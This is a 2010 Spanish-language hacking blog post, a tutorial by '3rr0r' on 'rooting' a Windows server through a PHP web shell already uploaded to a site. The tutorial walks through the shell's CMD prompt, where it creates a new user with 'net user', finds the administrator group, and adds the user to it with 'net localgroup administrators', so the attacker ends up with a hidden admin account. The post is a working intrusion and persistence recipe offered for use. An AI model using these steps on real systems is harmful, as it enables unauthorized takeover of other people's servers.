dimarts, 21 de desembre del 2010

Roteando Windows con shell en PHP

#############################
Tutorial Roteo de Windows by 3rr0r
#############################

1- Shell en php subida en web
2- Vamos a la DIR de la shell que anteriormente subimos.
3- Nos aparecera una pantalla negra.. por defecto ya esta configurada.
4- Nos dirigimos a la opcion inferior de la pantalla CMD

*Esto seria como una CMD normal i corriente de Windows. Podemos ejecutar comandos
para añadir i modificar usuarios, direcciones, permisos, etc.

################################
Añadiendo USER con default settings
################################

*En la linia de Comando introduciremos el siguiente codigo

--------------------------------------------------------------
Net User (nombre del user que querais) /add
-The command completed successfully.
--------------------------------------------------------------
Os aparecera un mnsj. que dirá lo siguiente más abajo:

-The command completed successfully.

#############################
Saber el nombre del Grupo Root
#############################

Ejecutaremos el comando:

-------------------------------
Net user administrator
-The command completed successfully.
-------------------------------

Abajo de todo nos aparecera el nomber del Grupo.
En mi caso:

User name                    Administrator
Full Name
Comment                      Built-in account for administering the computer/domain
User's comment
Country code                 000 (System Default)
Account active               No
Account expires              Never

Password last set            14/07/2009 5:55:45
Password expires             Never
Password changeable          14/07/2009 5:55:45
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   14/07/2009 5:53:58

Logon hours allowed          All

Local Group Memberships      *Administrators       *HomeUsers
Global Group memberships     *None
The command completed successfully.

La parte que nos interesa es la que dice lo siguiente:

Local Group Memberships      *Administrators       *HomeUsers

#######################
Dar permisos root a USER
#######################

Dependiendo de lo que nos ponga en 'Local Group Memberships' ejecutaremos el
siguiente comando:

--------------------------------------------------------
net localgroup administrators USER /add
-The command completed successfully.
--------------------------------------------------------
Donde 'administrators' = El nombre que nos dio Local Group Memberships
i 'USER' es el nombre que introdujimos en el primer comando para añadir
usuario.

Ahora ya tenemos un usuario con permisos ROOT (admin) en ese Windows.
Apartir de aqui ya podeis ejecutar el comando que querais dependiendo de vuestro
objetivo y finalidad.


Att: 3rr0r
Publicat per a

Cap comentari:

Publica un comentari a l'entrada

Subscriure's a: Comentaris del missatge (Atom)